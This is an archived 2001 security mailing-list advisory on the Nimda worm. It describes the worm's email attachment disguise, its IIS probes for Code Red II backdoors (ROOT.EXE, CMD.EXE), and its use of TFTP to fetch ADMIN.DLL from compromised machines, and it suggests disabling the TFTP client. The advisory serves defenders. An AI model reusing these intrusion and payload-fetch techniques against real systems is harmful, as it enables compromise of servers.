Return-Path: <sentto-279987-2035-1000830037-fc=all.net@returns.onelist.com> Delivered-To: fc@all.net Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Tue, 18 Sep 2001 09:22:10 -0700 (PDT) Received: (qmail 9846 invoked by uid 510); 18 Sep 2001 16:21:04 -0000 Received: from n27.groups.yahoo.com (216.115.96.77) by 204.181.12.215 with SMTP; 18 Sep 2001 16:21:04 -0000 X-eGroups-Return: sentto-279987-2035-1000830037-fc=all.net@returns.onelist.com Received: from [10.1.4.53] by fh.egroups.com with NNFMP; 18 Sep 2001 16:20:38 -0000 X-Sender: fc@big.all.net X-Apparently-To: iwar@onelist.com Received: (EGP: mail-7_3_2_2); 18 Sep 2001 16:20:37 -0000 Received: (qmail 33361 invoked from network); 18 Sep 2001 16:20:37 -0000 Received: from unknown (10.1.10.142) by l7.egroups.com with QMQP; 18 Sep 2001 16:20:37 -0000 Received: from unknown (HELO big.all.net) (65.0.156.78) by mta3 with SMTP; 18 Sep 2001 16:20:36 -0000 Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id JAA05742 for iwar@onelist.com; Tue, 18 Sep 2001 09:20:36 -0700 Message-Id: <200109181620.JAA05742@big.all.net> To: iwar@onelist.com (Information Warfare Mailing List) Organization: I'm not allowed to say X-Mailer: don't even ask X-Mailer: ELM [version 2.5 PL1] From: Fred Cohen <fc@all.net> Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com Delivered-To: mailing list iwar@yahoogroups.com Precedence: bulk List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com> Date: Tue, 18 Sep 2001 09:20:36 -0700 (PDT) Reply-To: iwar@yahoogroups.com Subject: [iwar] [fc:More.on.the.worms...] Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS. It appears that the attacks can come both from email and from the network. A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.) The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities. One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box. Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP. Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following; edit %systemroot/system32/drivers/etc/services. change the line; tftp 69/udp to; tftp 0/udp thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed. More information as it arises. Cheers, Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.5.2 iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6 iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO hSW7yN2lhJc= =YAwc -----END PGP SIGNATURE----- ------------------------ Yahoo! Groups Sponsor ---------------------~--> Do you need to encrypt all your online transactions? Secure corporate intranets? Authenticate your Web sites? Whatever security your site needs, you'll find the perfect solution here! http://us.click.yahoo.com/wOMkGD/Q56CAA/yigFAA/kgFolB/TM ---------------------------------------------------------------------~-> ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT